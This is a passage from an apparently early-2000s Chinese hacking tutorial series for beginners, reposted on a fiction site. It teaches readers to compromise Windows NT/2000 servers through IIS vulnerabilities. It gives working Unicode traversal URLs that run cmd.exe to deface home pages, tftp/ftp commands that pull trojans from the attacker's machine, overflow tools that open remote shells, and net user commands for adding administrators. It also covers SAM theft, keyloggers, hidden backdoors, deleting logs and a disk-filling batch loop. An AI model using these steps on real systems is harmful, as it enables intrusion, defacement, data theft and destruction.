  txt文件关联一样,其默认值也是“C:\windows\notepad.exe%1”,如果被修改,也要立刻改回正确的数据。
  至此,灰鸽子已经被你彻底扫地出门了,你不再担心成为别人"盘中餐”了。
優u书擝 uUtXT.COM 荃文自版月镀


第三卷 第七章 字数:19545
  ?第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。
  1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。
  2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆gamefan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。
  3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)
  4,oicq。我们学黑客,可不是学泡mm!bfctx你…………息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)
  5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!
  6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!
  7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!
  8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉(比较理想化)
  9,流光4for2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!
  10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。
  第一节操完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟操,包你会黑简单的站(哎哟!心慌了!)
  下一节操我们要介绍如何掌握一台主机的基本信息,期待中……
  ---------------------------------
  真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做操。
  今天的内容是获得主机的信息。我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。
  首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)
  第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。然后,我们应该知道它的ip,很简单,ping它一下就可以了。
  pingwww.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。
  知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
  21--ftp重要哦
  23--telnet欢呼吧
  25-smtp尽管重要,但似乎没什么可利用的
  53--domain同上
  79--finger可知道用户信息了
  80--http要看网页,没它不行吧
  110--pop收信的
  139--netbios共享用的,很有利用价值哦
  3389--win2000超级终端呵呵,这个好!
  其实端口有上千种,这些最最常用
  我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan,superscan,flux等等很多哦。这里我推荐superscan,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)
  那么我们该如何应对呢?
  ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)
  若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scanflux等吧!反正,有ftp就有一份希望
  telnet在!好!telnet111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)随便猜个,错了,闪人!
  smtp,看着它,无奈
  domain,一般它带了局域网了
  finger可以知道用户列表了,不好,忘了用法了,幸好finger很少出现
  80肯定在,我们等会来对付它
  110有smtp,pop在也不奇怪了
  139找个扫描器来找找有没有露在外面的共享吧,日后也用得着
  3389太太太好了!!打开客户端吧,用输入法漏洞试试,成了就干了它!不成也没事,我们以后完全控制它3389会很方便的。
  端口扫完了!我们在多了解它一点吧!追捕大家都知道吧,其实用它获取主机信息也不赖哦。打开追捕,输入ip,选择智能追捕,是不是有很多信息出来了?虽然不能直接利用,但毕竟我们有对它有了进一步的了解。
  掌握了那么多信息,我们该做点什么了,一般黑客入侵都是靠着系统漏洞,不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。
  对漏洞大家可能不太了解,我这里也不能一一说明了,太多了,感兴趣的话去论坛找freedom吧!
  目前广泛利用和存在的漏洞有:unicode,unicode后续,iis溢出,.idq,.frontpageextend,输入法漏洞等等大漏洞。至于如何确定,呵呵,绝对不会是一行一行地在ie中试吧,拿出x-scan吧,很好的扫描器哦!
  稍微设置一下就上路吧!过了一会,呵呵,报告出来了,快看,哇!漏洞一大堆!这下赚了!各条漏洞都有详细的信息,大家看吧,总比我说的准了。
  现在这台主机已经和我们成为亲戚了,要让这位亲爱的亲戚做点事,就要开始各种攻击了,下回我们就探讨一下最最可爱的unicode漏洞,各位可能就会在unicode中完成第一次黑客体验,再见:)
  ------------------------------------------
  今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。
  2000年10月17日中联绿盟发布了以下的安全公告:
  微软IIS4.0/5.0扩展UNICODE目录遍历漏洞
  远程漏洞:是
  本地漏洞:是
  发布日期:2000年10月17日
  更新日期:2000年10月17日
  受影响的版本:
  MicrosoftIIS5.0+MicrosoftWindowsNT2000MicrosoftIIS4.0+MicrosoftWindowsNT4.0+MicrosoftBackOffice4.5-MicrosoftWindowsNT4.0+MicrosoftBackOffice4.0-MicrosoftWindowsNT4.0
  这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。
  下面开始正式学习:
  一,UNICODE漏洞的原理
  此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。
  中文版的WIN2000中,UNICODE编码存在BUG,在UNICODE编码中
  %c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c='/'
  %c0%2f-〉(0xc0-0xc0)*0x40+0x2f=0x2f='\'
  在NT4中/编码为%c1%9c
  在英文版里:WIN2000英文版%c0%af
  在中文win2k里:%c1%1c
  此外还有多种编码,不一一阐述。
  本文例子均以win2k为准,其他类型请自行替换。
  二,一切从基础开始
  由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
  学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。
  如果成功,那么在浏览区可看到如下信息:
  DirectoryofC:\inetpub\scripts
  2000-09-2815:49〈DIR〉.
  2000-09-2815:49〈DIR〉..(假设目录中没有文件,实际上有一大堆)
  是不是有自己机器的感觉了,正点!就是这种感觉!
  cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
  http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir(这个命令同样道理)
  大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe
  会dos的朋友一定懂其意义了,不懂的请去看书.
  不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!
  三,实战演练
  1,修改主页!(是不是很爽?)
  一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。
  最方便的方法:在浏览器里输入http://11.11.22.22/.ida要是有漏洞,那在浏览器里便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。
  分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
  dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dirc:\iloveu.gif/s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。
  找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm
  那么我们就修改它吧!
  最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echocshu>c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echocshunice>>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  回应为:HTTP500-内部服务器错误
  通过对cmd的分析,袁哥得出一条简便的方法,加入"符号
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm
  回应为:cgi错误,不用理会
  两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧
  而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copycmd.exe为另一个exe,记住路径,用copy后的来echo
  例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
  11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页上传,这个我们后面介绍。
  几点忠告:
  1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
  2,echo前记得帮他们做好备份
  3,不准在主页里加入恶性语句
  2,下载文件
  要是有什么有用的文件被你发现,那我们如何下载呢?
  最简单的方法:把文件copy至网页目录下。copyc:\email\baby.emlc:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。
  别的方法:对不起,没想好:)
  3,最重要的上传
  一般方法:ftp法
  首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
  echo+openftp.cshu.com(ftp主机)>c:\hehe.haha
  echo+useryourname>>cc:\hehe.haha(yourname是用户名)
  echo+yourpasswd>>c:\hehe.haha(yourpasswd是密码)
  echo+getsetup.exe>>c:\hehe.haha要下载的文件
  echo+quit>>c:\hehe.haha
  完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)
  别忘了先上传到ftp主机,不要做马大哈哦!
  最简单的方法:tftp法。
  这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
  在这里我推荐ciscotftpserver,自己去找找把,实在没有来找我:)
  安装好后运行,别忘了设置好默认目录,否则会找不到文件
  tftp命令:tftp-i1.2.3.4GETihateu.exec:\winnt\ihateu.exe(ihateu.exe在默认目录里)
  1.2.3.4为你的ip,用unicode运行一下,会看到tftpserver里有反应了,这就好了,不一会,文件就传上去了,方便把!
  学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
  4,如何清除痕迹
  虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
  C:\winnt\system32\logfiles\*.*
  C:\winnt\ssytem32\config\*.evt
  C:\winnt\system32\dtclog\*.*
  C:\winnt\system32\*.log
  C:\winnt\system32\*.txt
  C:\winnt\*.txt
  C:\winnt\*.log
  全……擦掉!
  四,细节问题。
  1,遇到长文件名怎么办?
  c:\programfiles\
  就用c:\"program20%files"\
  2,遇到空格怎么办?
  20%代替喽,或者xxyy=xxyy~1
  3,如何做个很大的文件?
  目的就是破坏啦!我不喜欢不过教教你们啦
  @echooff
  echobig>c:\a.a
  :h
  copyc:\a.a+c:\a.ac:\a.a
  gotoh
  注意不要乱来啊!
  4,输入命令,没反应或反应不对。
  :)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!
  http://www.exsample.com/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir+c:\或http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\或http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\或http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
  不一定有用哦!
  5,如何找到unicode漏洞的主机
  呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
  不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
  6,我copy,del文件,怎么显示aceessdenined?
  这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!
  这个我会在今后介绍,现在你可以试试attrib
  attrib-r-h-sc:\autoexec.bat
  再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!
  7,我黑了主页,天下无敌?
  我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口
  echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!
  对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!
  要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择
  8,我如何做更多的事?
  第一,努力提高权限
  第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!
  -----------------------------------------
  一,frontpage扩展攻击。
  为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管白痴的疏忽(为什么白痴满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢白痴网管和微软啊!
  具体做法:
  1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。
  2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。
  3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!^_^)文件菜单下选择“打开站点”,然后在文件夹框里写入http://11.11.22.22(我习惯用这个做例子,以fp2000为准)注意http://不要漏掉。在按下“打开”按钮前,不要忘了祈祷:)一两秒后,出现了文件夹,好啊!成功了,现在就可以操作网页文件了。
  4,万一跳出错误信息,表示有密码(这个不算白痴)这时我们试着用以下url,http://11.11.22.22/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,应该是unix的加密,找个解密器破密码吧!运气好的话还可以改网页。
  我的看法:
  这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。
  二,iis.printer溢出攻击
  据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!
  具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此……溢出攻击是非常强大的!
  由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。
  具体方法:
  1,准备iishack,本站有下载,该版本可以对多种系统进行攻击。
  2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。
  3,在命令行方式执行iis5hack(主机ip)(端口号,默认80)(系统代号,具体可参考程序的说明)(shell口)
  例如:iis5hack11.11.22.22801111(以为在111端口开一个shell)
  4,用nc或telnet连上,nc/telnet11.11.22.22111,成功的话就可以控制机器了,加个用户,做个代理……
  我的看法:
  这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。
  三,idq/ida漏洞溢出攻击
  这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是snake的gui版本,很方便的。
  具体方法:
  1,准备snakeiis溢出程序。可以从本站下载。
  2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。
  3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。
  4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)
  5,欢呼吧!再次溢出,别忘了改shellcode为你想要的代码哦。
  6,重复4,很快一台新鲜的win2k被你控制了!
  我的看法:
  我很喜欢用这种攻击,因为win2k的3389可以很方便的为我做事,省力地搞到一台win2k,然后慢慢享用,爽到根尖细胞啊!大家应该掌握这项方法。
  四,*bsdtelnetd溢出攻击
  又是溢出,不过这个可是真正的热点哦,最近红盟等大型安全网站被黑就是因为这个!所以看看吧
  具体方法:
  1,使用fbsdhackforwin2k来攻击,本站有下载的
  2,还是要找到这样的主机,一般是xnix的,比较少的,用专门的扫描器吧,我会在不久放出来。
  3,等吧!这个漏洞要发送的信息很大,大约16mb,可怕吧,所以最好用高速肉鸡
  4,有幸成功了,记得请我吃饭!
  我的看法:
  这个漏洞的利用比较有难度,从找机器开始就是。但作为黑客爱好者,我们没有理由去回避它!
  五,密码暴力破解
  这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。
  具体方法:
  1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。
  2,找到一台相应的主机。
  3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来!
  4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧^_^
  --------------------------------
  大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。
  这是菜鸟操的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的狗屎运?算了算了,我不合那种欺世盗名之辈一般见识,开始做操吧!
  不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。
  在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。
  首先说说最简单的:systemtoadmin
  当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令:
  netuser察看用户表netuserusernamepass/add(添加密码为pass的用户username)
  netlocalgroup察看组netlocalgroupguestscshu/add把cshu用户加入guests组
  netuse\\ip\ipc$"password"/user:username这是远程连接的命令
  假如我们溢出了11.11.22.22,那么这样做吧!
  netuser(看到了iusr_machinename的用户了,它一般没什么权限的)
  netuseriusr_machinenamecshu(把它的密码设为cshu)
  netlocalgroupadministratorsiusr_machinename/add(加入administrators组)
  这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!
  熟悉一下netuse命令:
  netuse\\11.11.22.22\ipc$"cshu"/user:iusr_machinename建立连接
  copyc:\haha.exe\\11.11.22.22\admin$把haha.exe复制到机器c:\winnt\system32上,若是c$.d$,就表示c,d盘
  nettime\\11.11.22.22看到了时间了,比如是8点
  at\\11.11.22.228:03haha.exe就会在8点3分执行。
  netuse\\11.11.22.22/delete断开连接
  应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:)
  是不是很简单?所以我是溢出是很厉害的攻击方法。
  3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)
  总的来说,还是unicode的机器最多,为什么白痴网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。
  首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。
  1,如果我们可以对winnt\repair和winnt\config进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp把get改成put下载下来,或者把它复制到inetpub\wwwroot下,改成zip下载。
  拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。
  2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!
  3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)
  4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!
  5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documentsandsettings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.
  6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。
  总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)
  想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。
  那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!
  ----------------------------------------
  这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。
  今天说点什么呢?没有主题,乱谈一通吧!
  首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。
  我来说说我自己觉得最有用的几个项目:
  1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。
  remoteexecute-x这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)
  remoteftppcawfilemethod-x这是远程获取pcanywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!
  remoteftpsam-x拿sam的,还是用最好的lc3来解吧!
  frontpageextended这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilegehole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点,http://ip就可以了!(http://不要忘)
  此外还有一点变通,大家肯定读的懂的。
  2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。
  3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!
  总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的。
  然后我想说说一些黑站的经验。
  ☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。
  上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!
  推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)
  最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)
  ☆我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poisonbox,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!
  我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?
  ☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:
  netstarttermservice启动win2k的终端控制
  netstartworkstation打开netuse功能
  netstartlanmanserver打开ipc
  netstarteventlog启动日志(你不会那么傻吧!stop)
  netstartschedule打开计划(at)
  netstartserver共享
  还有很多,net命令里去找吧!
  ☆打开telnet
  1,远程去运行ntlm.exe,流光里有
  2,netstoptelnet
  3,netstarttelnet
  ☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!
  至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!
  ☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。
  具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。
  做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!
  要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc.126.com国内最最好的的代理站点,怕死的朋友千万不要错过。
  最后说说一些对于菜鸟同志的建议:
  不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的……
  不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。
  不要和被你黑的网管过多接触,前车之鉴哦。
  对于一台好机器要做好后门,不要轻易失去它。
  想好好学黑客的话,就常去各大论坛转转,仔细读教程,忘记聊天室和网络游戏吧!
  实践是最好的教程,再次重申!
  应该多学计算机的其他方面的知识,任何知识在一定场合都是有用的。
  编程技术……好像太难了,不过再难也要学。
  想不出来了………………
  好了,我们的菜鸟操终于结束了,我这个大菜鸟也可以退休了,拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站,不知道大家是否成功了,不管这么样,我们都该不断的努力学习,不是吗?
憂U書擝 uuTXt。COM 荃文字扳粤镀


第三卷 第八章 字数:5120
  ?怎样从ipc$到开放3389到最后3389只为你服务!
  工具:流光4.7(http://www.heibai.net/download/show.php?id=2277&down=1)
  Wollfv1.6(http://www.heibai.net/download/show.php?id=2996&down=1)
  HBULOT(http://www.heibai.net/download/show.php?id=2951&down=1)
  本机平台:2000/NT
  目标平台:2000/NT
  以上工具在黑白均能找到,具体使用方法会在文章中会介绍。
  首先打开流光(如果你连流光都没听过过的话,我想你没必要看这篇文章),Ctrl+A,填上一段ip,选择IPC扫
  描。过一会有结果了:
  218.22.155.*(SERVER)
  --------------------------------------------------------------------------------
  IPC扫描
  获得共享列表
  gfehI
  获得用户列表
